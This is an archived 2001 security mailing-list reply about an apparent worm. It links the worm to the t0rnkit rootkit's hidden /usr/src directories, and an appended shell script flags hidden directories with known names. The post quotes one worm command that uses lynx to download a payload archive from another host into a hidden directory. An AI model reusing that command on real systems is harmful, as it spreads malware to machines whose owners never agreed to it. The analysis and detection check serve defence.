Security Incidents mailing list archives
Re: sunrpc / wu-ftpd worm ?
From: daniel_gerald () HOTMAIL COM
Date: Tue, 16 Jan 2001 16:03:57 -0000
" lynx -source http://%s:27374 /usr/src/.poop/ramen.tgz "
hmmmm... seems like this is another modified version of old t0rnkit 7. The use of the /usr/src directory for hiding rootkit files is just the same as the old t0rnkit with its /usr/src/.puta directory. Ever since t0rnkit 7 was made public by the author, there have been many modified versions of it, some with plain directory name changes and others with some replacement trojans; however, most or all of the versions retain the rootkit directory structures and the config files.
-danny.
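The message above notes that variants change the directory name but keep its location, so a host check keyed on the location catches renamed copies that a name list would miss. The following is an added example, not part of the original post: the function name, output labels and return codes are assumptions made for illustration, and only the two directory names come from the message.

```shell
#!/bin/sh
# Added example: flag hidden directories directly under a source-tree root.
# KNOWN_NAMES holds the two directory names quoted in the message; every
# other name and output label here is constructed for illustration.

KNOWN_NAMES=".poop .puta"

# scan_hidden_dirs ROOT
# Prints one line per hidden directory found directly under ROOT:
#   KNOWN <path>    name matches one quoted in the message
#   HIDDEN <path>   any other dot-directory (renamed variant, or benign)
# Returns 0 if nothing was found, 1 if something was flagged, 2 on bad input.
scan_hidden_dirs() {
    root=$1
    found=0
    [ -d "$root" ] || { echo "ERROR $root is not a directory" >&2; return 2; }
    for path in "$root"/.[!.]* "$root"/..?*; do
        # Unmatched globs stay literal and fail the -d test; symlinks are
        # skipped so a link cannot point the check somewhere else.
        [ -d "$path" ] && [ ! -L "$path" ] || continue
        name=${path##*/}
        label=HIDDEN
        for known in $KNOWN_NAMES; do
            [ "$name" = "$known" ] && label=KNOWN
        done
        echo "$label $path"
        found=1
    done
    return "$found"
}

# Read-only run against a live system:
#   scan_hidden_dirs /usr/src
```

A HIDDEN result is a lead to investigate rather than proof of compromise, and the check should be run from trusted media if replaced system binaries are suspected.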